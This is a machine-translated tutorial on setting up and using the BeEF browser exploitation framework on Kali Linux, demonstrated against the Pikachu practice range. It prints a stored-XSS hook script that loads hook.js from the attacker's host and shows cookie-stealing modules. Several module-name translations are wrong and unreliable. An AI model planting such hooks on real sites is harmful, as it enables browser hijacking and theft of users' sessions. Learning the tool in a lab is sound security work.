Beef-Xss Introduction to tools

KaliLinux Introduction address of this tool on the official website ：https://www.kali.org/tools/beef-xss/
GitHub Address ：https://github.com/beefproject/beef
Beef-Xss Tools Wiki:https://github.com/beefproject/beef/wiki

BeEF Is the abbreviation of browser development framework , It is a penetration testing tool focusing on Web browsers
As people become more and more worried about targeting clients （ Including mobile clients ） Network attack of ,BeEF Allow professional penetration testers to evaluate the actual security status of the target environment by using client attack vectors , Unlike other security frameworks ,BeEF Beyond rugged network boundaries and client systems , And check availability in the context of an open door ：Web browser
BeEF Hook one or more Web browser , And use them as beachhead to start directional command module , And further attack the system from the browser context

install Beef-Xss Tools

This tool is the latest KaliLinux Version this tool is not installed by default , The previous version was self-contained, no matter how

apt-get install beef-xss

or

sudo apt-get install beef-xss

All the way y Just fine , And then wait
If the following figure appears , The solution is to change the address source or apt update After restart, execute the installation command

start-up Beef-Xss Tools

beef-xss

The first startup may prompt this , Let you enter a new password , Enter enter （ The password you entered will not be displayed ） Next time I won't let you enter

It will automatically open the browser beef Console （ Account default ：beef password （ Your first entry into beef Input ））

close Beef-Xss

beef-xss-stop

Beef-Xss Login account password forgotten solution ：

After installation /usr/share/beef-xss There is a config.yaml The password and account number are recorded in the file ：

use vim Or open it in other ways config.yaml In file credentials: Under the user It's an account 、passwd It's a password , Modify and save directly

start-up Beef-Xss Then the console will have a message

beef Of xss Code format ：

<script src="http://<IP>:3000/hook.js"></script>

Example ： Such as my KaliLinux Of ip Address ：192.168.56.129

<script src="http://192.168.56.129:3000/hook.js"></script>

beef Console address

http://127.0.0.1:3000/ui/panel
Or mine. KaliLinux Of ip Address ：192.168.56.129 Enter in the host browser ：http://192.168.56.129:3000/ui/panel Fine

Beef-Xss Use

I use pikachu shooting range xss Storage demonstration of ：

The above has seen success , Sometimes it's not very fast to show. Wait a moment to refresh

After getting these , The above functions can be realized in commands View in

commands What does the module mean

I use google translate directly here

Click any one with instructions, such as playing sound module

Browser（ Browser module ）

Chrome Extensions (Chrome Expand )

Debug ( debugging )

Exploits（ Exploit ）

Host( host )

IPEC( International environmental protection advocates )

Using communication (IPEC) Operations performed

Metasploit

Misc( miscellaneous )

Network( The Internet )

Persistence( insist )

Phonegap( Telephone gap )

Social Engineering( Social engineering )

Simply use a play sound

There is one biu A voice of

Check if there is VLC

obtain cookie

There are many other functions that will not be demonstrated here